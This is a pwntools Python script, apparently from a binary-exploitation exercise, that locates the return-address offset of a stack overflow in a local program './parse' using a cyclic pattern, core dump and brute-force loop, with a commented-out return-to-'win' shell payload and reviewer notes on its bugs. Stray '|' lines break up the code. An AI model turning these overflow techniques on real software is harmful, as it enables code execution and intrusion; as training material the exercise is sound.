from pwn import *
|
|
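context(arch='amd64', os='linux')

# Length of the de Bruijn pattern used to locate the return-address offset.
# It must be longer than the vulnerable buffer: with the original 5-byte
# pattern nothing overflows and the 8-byte packed return address can never be
# found inside it (which is why the assert at the bottom had been commented
# out).  The brute-force loop further down scans 50..350, so 512 covers it.
PATTERN_LEN = 512

# Generate a cyclic pattern so that we can auto-find the offset
payload = cyclic(PATTERN_LEN)

# Run the process once so that it crashes
p = process(['./parse'])
p.sendline(payload)

# The core file is only written once the child has died; reading it before
# that races the kernel (or picks up a stale core from an earlier run).  The
# wait is bounded so a non-crashing run cannot hang the script.
p.wait_for_close(timeout=5)
p.close()

# Get the core dump
# NOTE(review): a fixed './core' path depends on /proc/sys/kernel/core_pattern
# and silently reuses a stale file if this run did not crash; p.corefile
# locates the core of *this* child and is the safer choice where available.
core = Coredump('./core')

# Our cyclic pattern should have been used as the crashing address
# NOTE(review): on amd64 a `ret` to a non-canonical address faults before rip
# is updated, so rip often still points at the `ret` itself and the pattern
# bytes sit at core.rsp instead -- check core.read(core.rsp, 8) as well, and
# remember cyclic_find() expects context.cyclic_size-byte (default 4) chunks.
print(type(pack(core.rip)))
print(type(payload))

# Non-fatal check (see the rip-vs-rsp note above); a failed assert would have
# aborted the script before the brute-force fallback below ever ran.
if pack(core.rip) not in payload:
    log.warning('packed rip not found in pattern; try core.read(core.rsp, 8)')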
|
|
|
|
|
|
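# Brute-force the crash length by feeding growing runs of 'A'.
# NOTE(review): sendline() appends '\n', so the child actually receives i + 1
# bytes each round -- that is very likely the "one longer than it should be"
# the original author observed, and why the reported value is i - 1.
for i in range(50, 350):
    p = process(['./parse'])
    try:
        # bytes, not str: py3 pwntools only warns on str, but be explicit.
        p.sendline(b'A' * i)
        received = p.recvline()    # output from program
        received += p.recvline()   # "Segmentation fault" if crash, else empty
        if b'Segmentation' in received:
            print('Crash at %d characters' % (i - 1))
            print('Crash at value will be %s' % hex(i - 1))
            break
    except EOFError:
        # The child died (or closed stdout) before printing a second line.
        # NOTE(review): a crashing child that prints nothing lands here too,
        # so a silent crash looks the same as a clean exit; inspect
        # p.poll() / p.returncode (-11 == SIGSEGV) if the loop never breaks.
        pass
    finally:
        p.close()   # do not leak one child process per iteration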
|
|
|
|
|
|
|
|
# Cool! Now let's just replace that value with the address of 'win'.
# NOTE(review): the template below targets './mini-ntpclient' and passes the
# payload as argv[1], while everything above runs './parse' and feeds stdin --
# fix the binary name and the delivery method before uncommenting it.
#crash = ELF('./mini-ntpclient')
|
|
#payload = fit({
|
|
# cyclic_find(core.rip): crash.symbols.win
|
|
#})
|
|
|
|
# Get a shell!
|
|
#io = process(['./mini-ntpclient' , payload])
|
|
#io.sendline(b'id')
|
|
#print(io.recvline())
|
|
# uid=1000(user) gid=1000(user) groups=1000(user)
|